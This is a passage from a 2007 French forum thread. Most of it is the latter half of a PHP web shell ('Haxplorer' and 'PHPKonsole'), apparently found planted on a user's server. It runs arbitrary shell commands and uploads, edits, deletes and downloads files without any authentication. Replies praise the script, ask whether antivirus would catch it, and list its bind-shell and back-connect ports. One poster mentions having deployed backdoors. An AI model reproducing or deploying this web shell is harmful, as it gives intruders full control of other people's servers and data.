  477.   printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
  478.   echo "&nbsp;&nbsp;&nbsp;";
  479.   $Fi++;
  480.  }
  481.  $from = $Fi*$Pmax;
  482.  while (($filelist[$from]=="." ) || ($filelist[$from]==".." )) $from++;
  483.  $to = count($filelist)-1;
  484.  if ($Fi == $Pidx)
  485.   $link="";
  486.  else
  487.   $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
  488.  printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
  489.  echo "</center></td></tr></table></td></tr>";
  490. }
  491.      echo "</table>\n<br><table NOWRAP>";
  492.    if ($isGoodver) {
  493.  echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
  494. }
  495.  else {
  496.  echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
  497. }
  498.         /* <!-- Other Actions --> */
  499.     echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
  500.    echo "<td>&nbsp;<b>".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir" )."\n".sp(3).
  501.                      buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir" )."\n".sp(3).
  502.        buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir" ). "</b>\n</td></tr>\n";
  503.      echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
  504.    echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
  505.    echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
  506.    echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
  507.    echo "<table NOWRAP>";
  508.         echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n";
  509.     echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n";
  510.    echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n";
  511.    echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n";
  512.    echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
  513.    echo "</table></td>";
  514.  echo "</table>";
  515.  echo "<br>";
  516.       @closedir($h);
  517.   }
  518.   elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
  519.  echo system("$file" );
  520. }
  521. elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
  522. echo "<center><table><tr><td NOWRAP>" ;
  523.  if ($auth == "yes" ) {
  524.  if (Mydeldir($file)==false) {
  525.    echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
  526.     }
  527.   else {
  528.    echo "Successfully removed \"$file\"<br>";
  529.   }
  530.   echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
  531. }
  532.  else {
  533.  echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
  534.         <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  535.         <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
  536.       <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
  537.       <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
  538.       <input type=\"hidden\" name=\"file\" value=\"$file\">
  539.       <input type=\"hidden\" name=\"auth\" value=\"yes\">
  540.       <input type=\"submit\" value=\"Yes\"></form>
  541.         <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  542. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  543. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  544. <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
  545.         }
  546.  echo "</td></tr></center>";
  547. }
  548. elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ;
  549.  if ($auth == "yes" ) {
  550.  if (@unlink($file)==false) {
  551.    echo "Could not remove \"$file\"<br>";
  552.     }
  553.   else {
  554.    echo "Successfully removed \"$file\"<br>";
  555.   }
  556.  echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
  557.         }
  558.  else {
  559.         echo "Are you sure you want to delete \"$file\" ?
  560.        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  561.       <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
  562.       <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
  563.       <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
  564.       <input type=\"hidden\" name=\"file\" value=\"$file\">
  565.       <input type=\"hidden\" name=\"auth\" value=\"yes\">
  566.       <input type=\"submit\" value=\"Yes\"></form>
  567.         <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  568. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  569. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  570. <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
  571.         }
  572.  echo "</td></tr></center>";
  573. }
  574. elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
  575. echo "<center><table><tr><td NOWRAP>";
  576.  $i = 1;
  577.  while (file_exists("$lastdir/newfile$i.txt" ))
  578.   $i++;
  579.  $file = fopen("$lastdir/newfile$i.txt", "w+" );
  580.  if ($file == false)
  581.   echo "Could not create the new file...<br>";
  582.  else
  583.   echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
  584.   echo "
  585.       <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  586.   <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  587.   <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  588.   <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
  589.   </form></center>
  590.    </td></tr></table></center>     ";
  591. }
  592. elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
  593. echo "<center><table><tr><td NOWRAP>" ;
  594.  $i = 1;
  595.  while (is_dir("$lastdir/newdir$i" ))
  596.     $i++;
  597.  $file = mkdir("$lastdir/newdir$i", 0777);
  598.  if ($file == false)
  599.   echo "Could not create the new directory...<br>";
  600.  else
  601.   echo "Successfully created: \"$lastdir/newdir$i\"<br>";
  602.  echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
  603.  <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  604.  <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  605.  <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
  606.  </form></center></td></tr></table></center>";
  607. }
  608. elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
  609. $contents = "";
  610. $fc = @file( $file );
  611.    while ( @list( $ln, $line ) = each( $fc ) ) {
  612.     $contents .= htmlentities( $line ) ;
  613.  }
  614.  echo "<br><center><table><tr><td NOWRAP>";
  615. echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
  616. echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
  617. echo "<strong>EDIT FILE: </strong>$file<br>\n";
  618. echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
  619. echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
  620. echo "<input type=\"submit\" value=\"Save\">";
  621. echo "</form>";
  622. echo "</td></tr></table></center>";
  623. }
  624. elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
  625. $fo = fopen($file, "w" );
  626. $wrret = fwrite($fo, stripslashes($contents));
  627. $clret = fclose($fo);
  628. }
  629. elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
  630. $downloadfile = urldecode($file);
  631. if (function_exists("basename" ))
  632.       $downloadto = basename ($downloadfile);
  633. else
  634.  $downloadto = "download.ext";
  635. if (!file_exists("$downloadfile" ))
  636.  echo "The file does not exist";
  637. else {
  638.  $size = @filesize("$downloadfile" );
  639.  if ($size != false) {
  640.   $add="; size=$size";
  641.  }
  642.  else {
  643.   $add="";
  644.  }
  645.   header("Content-Type: application/download" );
  646.  header("Content-Disposition: attachment; filename=$downloadto$add" );
  647.  $fp=fopen("$downloadfile" ,"rb" );
  648.  fpassthru($fp);
  649.  flush();
  650. }
  651. }
  652. elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
  653.     ?>
  654. <center>
  655.  <table>
  656.   <tr>
  657.    <td NOWRAP>
  658.       Welcome to the upload section...
  659.   Please note that the destination file will be
  660.  <br> overwritten if it already exists!!!<br><br>
  661.   <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
  662.    <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
  663.    <input type="hidden" name="cmd" value="uploadproc">
  664.    <input type="hidden" name="dir" value="<?php echo $dir ?>">
  665.    <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
  666.    <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
  667.    Select local file:<br>
  668.    <input size="75" name="userfile" type="file"><br>
  669.    <input type="submit" value="Send File">
  670.   </form>
  671.  <br>
  672.   <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
  673.   <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
  674.   <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
  675.   <input tabindex="0" type="submit" value="Cancel">
  676.  </form>
  677.    </td>
  678.   </tr>
  679.  </table>
  680. </center>
  681.  <?php
  682. }
  683. elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
  684. echo "<center><table><tr><td NOWRAP>";
  685. if (file_exists($userfile))
  686.  $res = copy($userfile, "$dir/$userfile_name" );
  687. echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
  688.       if ($res) {
  689.  echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
  690.  echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>";
  691.  echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
  692. }
  693. else {
  694.  echo "Could not move uploaded file; Action aborted...";
  695. }
  696. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
  697. echo "<br><br></td></tr></table></center>";
  698. }
  699. elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
  700.         echo "<hr>";
  701. $fc = @file( $file );   while ( @list( $ln, $line ) = each( $fc ) ) {
  702.     echo spacetonbsp(@htmlentities($line))."<br>\n";
  703.    }
  704. echo "<hr>";
  705. }
  706. elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
  707.       if (function_exists('is_dir')) {
  708.   if (is_dir("$oldfile" )) {
  709.    $objname = "Directory";
  710.    $objident = "Directory";
  711.     }
  712.   else {
  713.    $objname = "Filename";
  714.    $objident = "file";
  715.   }
  716.  }
  717.     echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
  718. If (empty($newfile) != true) {
  719.   echo "<center>";
  720.   $return = @rename($oldfile, "$olddir$newfile" );
  721.  if ($return) {
  722.    echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
  723.   }
  724.   else {
  725.    if ( @file_exists("$olddir$newfile" ) ) {
  726.     echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
  727.    }
  728.    else {
  729.     echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
  730.    }
  731.     }
  732.   echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
  733.  }
  734.  else {
  735.   $dpos = strrpos($oldfile, "/" );
  736.   if (strval($dpos)!="" ) {
  737.    $olddir = substr($oldfile, 0, $dpos+1);
  738.      }
  739.   else {
  740.    $olddir = "$lastdir/";
  741.  }
  742.   $fpos = strrpos($oldfile, "/" );
  743.   if (strval($fpos)!="" ) {
  744.    $inputfile = substr($oldfile, $fpos+1);
  745.      }
  746.   else {
  747.    $inputfile = "";
  748.   }
  749.          echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
  750.   echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
  751.   echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
  752.   echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
  753.   echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
  754.   echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
  755.   echo "Rename \"$oldfile\" to:<br>\n";
  756.   echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
  757.  echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
  758.   echo "</td></tr></table></center>";
  759.  }
  760. }
  761. else if ( $cmd == "con" ) {
  762. ?>
  763. <center>
  764. <table>
  765. <tr><td>
  766. <h3>PHPKonsole</h3>
  767. <?php
  768. if (ini_get('register_globals') != '1') {
  769.     if (!empty($HTTP_POST_VARS))
  770. extract($HTTP_POST_VARS);
  771.  
  772.     if (!empty($HTTP_GET_VARS))
  773. extract($HTTP_GET_VARS);
  774.      
  775.     if (!empty($HTTP_SERVER_VARS))
  776. extract($HTTP_SERVER_VARS);
  777.     }
  778.     
  779.     if (!empty($work_dir)) {
  780. if (!empty($command)) {
  781.     if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
  782.         if ($regs[1][0] == '/') {
  783.             $new_dir = $regs[1];
  784.  } else {
  785.      $new_dir = $work_dir . '/' . $regs[1];
  786.  }
  787.  if (file_exists($new_dir) && is_dir($new_dir)) {
  788.      $work_dir = $new_dir;
  789.  }
  790.  unset($command);
  791.     }
  792. }
  793.     }
  794.     if (file_exists($work_dir) && is_dir($work_dir)) {
  795. chdir($work_dir);
  796.     }
  797.     $work_dir = exec('pwd');
  798. ?>
  799.     <form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post">
  800. <table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b>
  801. <input type="hidden" name="cmd" value="con">
  802. <?php
  803.     $work_dir_splitted = explode('/', substr($work_dir, 1));
  804.     printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr);
  805.     if (!empty($work_dir_splitted[0])) {
  806.  $path = '';
  807.  for ($i = 0; $i < count($work_dir_splitted); $i++) {
  808.      $path .= '/' . $work_dir_splitted[$i];
  809.      printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]);
  810.  }
  811.     }
  812. ?></b></td>
  813. <td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()">
  814. <?php
  815. $dir_handle = opendir($work_dir);
  816. while ($dir = readdir($dir_handle)) {
  817.     if (is_dir($dir)) {
  818.  if ($dir == '.') {
  819.      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
  820.  } elseif ($dir == '..') {
  821.      if (strlen($work_dir) == 1) {
  822.      }
  823.      elseif (strrpos($work_dir, '/') == 0) {
  824.   echo "<option value=\"/\">Parent Directory</option>\n";
  825.      } else {
  826.   echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/" ), 1)) ."\">Parent Directory</option>\n";
  827.      }
  828.  } else {
  829.      if ($work_dir == '/') {
  830.   echo "<option value=\"$work_dir$dir\">$dir</option>\n";
  831.      } else {
  832.   echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
  833.      }
  834.  }
  835.     }
  836. }
  837. closedir($dir_handle);
  838. ?>
  839. </select></td></tr></table>
  840. <p>Command: <input class="inputtext" type="text" name="command" size="60">
  841. <input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p>
  842. <p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>></p>
  843. <textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php
  844.     if (!empty($command)) {
  845.         echo "phpKonsole> ". htmlspecialchars($command) . "\n\n";
  846.  if ($stderr) {
  847.      $tmpfile = tempnam('/tmp', 'phpshell');
  848.      $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile";
  849.  } else if ($command == 'ls') {
  850.      $command .= ' -F';
  851.  }
  852.  $output = `$command`;
  853.  echo htmlspecialchars($output);
  854.     }
  855. ?></textarea>
  856.     </form>
  857.                                  
  858.     <script language="JavaScript" type="text/javascript">
  859. document.forms[0].command.focus();
  860.     </script>
  861. </td></tr></table>
  862. <?php
  863. }   
  864. else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
  865. $isMainMenu = true;
  866.      ?>
  867. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  868.  <tr>
  869.   <td width="100%" class="border">
  870.    <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
  871.   </td>
  872.  </tr>
  873. </table>
  874. <br>
  875.  <center>
  876. <table border="0" NOWRAP>
  877.   <tr>
  878.   <td valign="top" class="silver border">
  879.            <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> Haxplorer <==</strong></font>", "cmd=dir&dir=." ).sp(2); ?>
  880.   </td>
  881.    <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
  882.    Haxplorer is a server side file browser wich (ab)uses the directory object to list
  883.     the files and directories stored on a webserver. This handy tools allows you to manage
  884.     files and directories on a unsecure server with php support.<br><br>This entire script
  885.     is coded for unsecure servers, if your server is secured the script will hide commands
  886.     or will even return errors to your browser...<br><br>
  887.   </td>
  888.  </tr>
  889.   <tr>
  890.   <td valign="top" class="silver border">
  891.            <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> PHPKonsole <==</strong></font>", "cmd=con" ).sp(2); ?>
  892.   </td>
  893.    <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
  894.    <br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver.
  895.     When you run commands they will run as the webservers UserID. This should work perfectly
  896.     for managing files, like moving, copying etc. If you're using a linux server, system commands
  897.     such as ls, mv and cp will be available for you... <br><br>This function will only work if the
  898.     server supports php and the execute commands...<br><br>
  899.   </td>
  900.  </tr>
  901.         </table>
  902. </center>
  903. <br>
  904.      <?php
  905. }
  906. if ($cmd != "downl" ) {
  907. if ( $isMainMenu != true) {
  908.   ?>
  909.  <table width="100%" border="0" cellpadding="0" cellspacing="0">
  910.   <tr>
  911.    <td width="100%" style="class="silver border">
  912.     <center><strong>
  913.      &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=" );      ?>&nbsp;&nbsp;
  914.      &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;PHPKonsole&nbsp;] </font>", "cmd=con" );        ?>&nbsp;&nbsp;
  915.                     &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Haxplorer&nbsp;]  </font>", "cmd=dir&dir=." );  ?> &nbsp;&nbsp;
  916.      </strong></center>
  917.    </td>
  918.   </tr>
  919.  </table>
  920.  <br>
  921.  <?php
  922. }
  923. ?>
  924. <table width=100% border="0" cellpadding="0" cellspacing="0">
  925.  <tr>
  926.   <td width="100%" class="silver border">
  927.    <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
  928.   </td>
  929.  </tr>
  930. </table>
  931.     </td>
  932.   </tr>
  933. </table>
  934.   <?php
  935. }
  936. ?>
  937. </body>
  938. </html>
  939. </body>
  940. </html>


Message édité par le_phoenix le 16-11-2007 à 20:04:56
Reply

Marsh Posté le 17-11-2007 à 19:12:18    

Vraiment pratique le script Magic Picture.
C'est ce genre de script (sans fioriture graphique et très complet) que je recherche, j'imaginais pas que j'allais trouver ça chez les hackers :-)
Si tu en as d'autre comme ça n'hésite pas à les poster.

Reply

Marsh Posté le 01-12-2007 à 01:00:04    

je n'ai pas très bien compris ce code en PHP, à quoi sert ce script, finalement, s'il vous plait ?


Message édité par wind128 le 01-12-2007 à 01:01:51
Reply

Marsh Posté le 01-12-2007 à 01:28:55    

A faire ce qu'on veut sur le serveur web sans passer par le ftp

Reply

Marsh Posté le 01-12-2007 à 20:57:19    

si je mets ce script sur une page html, comment cela se présente-t-il ?
est-ce que l'antivirus va signaler quelque chose par exemple ?

Reply

Marsh Posté le 02-12-2007 à 22:35:54    

Y'a pas de raison sauf avec un antivirus qui aurait des signatures de code php .
 
Maintenant, vu comme tu en parles, je suis pas sûr que tu comprennes bien l'environnement d'éxécution d'un script php via un serveur http :)

Reply

Marsh Posté le 03-12-2007 à 00:44:15    

wind128, si tu met le script chez toi file nous l'adresse de ton site web histoire de voir si ca fonctionne bien   :wahoo:

Reply

Marsh Posté le 03-12-2007 à 00:44:15   

Reply

Marsh Posté le 06-12-2007 à 09:05:42    

Reply

Marsh Posté le 06-12-2007 à 18:53:03    

PierreC a écrit :

wind128, si tu met le script chez toi file nous l'adresse de ton site web histoire de voir si ca fonctionne bien   :wahoo:


C'est très gentil de ta part  :ange:

Reply

Marsh Posté le 06-12-2007 à 20:50:14    

Un super script pour tout browser y compris les fichiers du PC, les informations du système si la fonction exec n'est pas désactivée. Bref de quoi faire un casse sur la machine.
 
Moi j'ai trouvé plusieurs fois des vers pour intégrer des botnets, mais les pirates font tellement attention à ne pas se faire pirater que c'est presque indéchiffrable.


Message édité par czh le 06-12-2007 à 20:53:11
Reply

Marsh Posté le 07-12-2007 à 16:03:41    

Bonjour
Pour revenir sur le début de ton message, tu n'as qu'à aller voir la gendarmerie, car il s'agit purement et simplement d'un acte de piratage... dépot de plainte contre X a priori mais ne t'en fais pas ils trouveront... (ma signature te le confirmera peut être)


---------------
http://www.ypikay.com
Reply

Marsh Posté le 13-12-2007 à 19:32:58    

Ya quand meme une zone "louche" sur la premiere source, yaurait pas un bindshell sur le port 8081 par hasard ?
Verifie sur ton serveur au cas où.
 
Peu probable que ce soit le cas, a mon avis ce genre de choses nécessitent les droits d'exec, ce que tu n'as evidemment pas sur du mutualisé, si t'es en dedié, là, toi seule connait la réponse ;)
 
EDIT: tu n'as pas qu'un port a verifier...

Code :
  1. $bindport_port = "31373"; // default port for binding
  2. $bc_port = "31373"; // default port for back-connect
  3. $datapipe_localport = "8081"; // default port for datapipe


Verifie que t'as pas un de ces port en LISTENING..


Message édité par ZePRiNCE le 13-12-2007 à 19:36:49

---------------
A VENDRE: Razer Chroma ARGB Controller / Boitier / Support Triple Screen / Ventirad / Carte USB3
Reply

Marsh Posté le 14-12-2007 à 00:18:59    

Et pour tester le script sans se tapper les 1000 numéros de lignes à effacer dans notepad ?


Message édité par grosbin le 14-12-2007 à 00:19:22

---------------
Photos Panoramiques Montagnes Haute Savoie
Reply

Marsh Posté le 14-12-2007 à 06:52:02    

Notepad++ -> Effacer les numeros de ligne, si je ne m'abuse.

Message cité 1 fois
Message édité par bapho13 le 14-12-2007 à 06:52:11
Reply

Marsh Posté le 14-12-2007 à 09:24:45    

Pas trouvé, mais je trouve le script ordinaire, j'ai déjà déployé des backdoors dont je me suis jamais servi


---------------
Photos Panoramiques Montagnes Haute Savoie
Reply

Marsh Posté le 14-12-2007 à 09:43:22    

Ou utiliser un vrai navigateur qui, quand on sélectionne le texte de la zone de code, ne sélectionne pas les numéros de lignes.
Ou, plus simple, "citer" le message dans une réponse. On peut alors sélectionner tout le code sans se prendre la tête.
 
M'enfin, :pfff:


---------------
Kao ..98 - Uplay (R6S) : kao98.7.62x39 - Origin (BF4, BF1) : kntkao98
Reply

Marsh Posté le 14-12-2007 à 10:23:15    


Ou faire "répondre" au post et récupérer directement ce qu'il y a entre les balises [code]...
 
-- Grmpf, grillé en fait --


Message édité par MagicBuzz le 14-12-2007 à 10:23:52
Reply

Marsh Posté le 14-12-2007 à 10:48:14    

Never knew that, c'est sympa :)


---------------
Photos Panoramiques Montagnes Haute Savoie
Reply

Marsh Posté le    

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed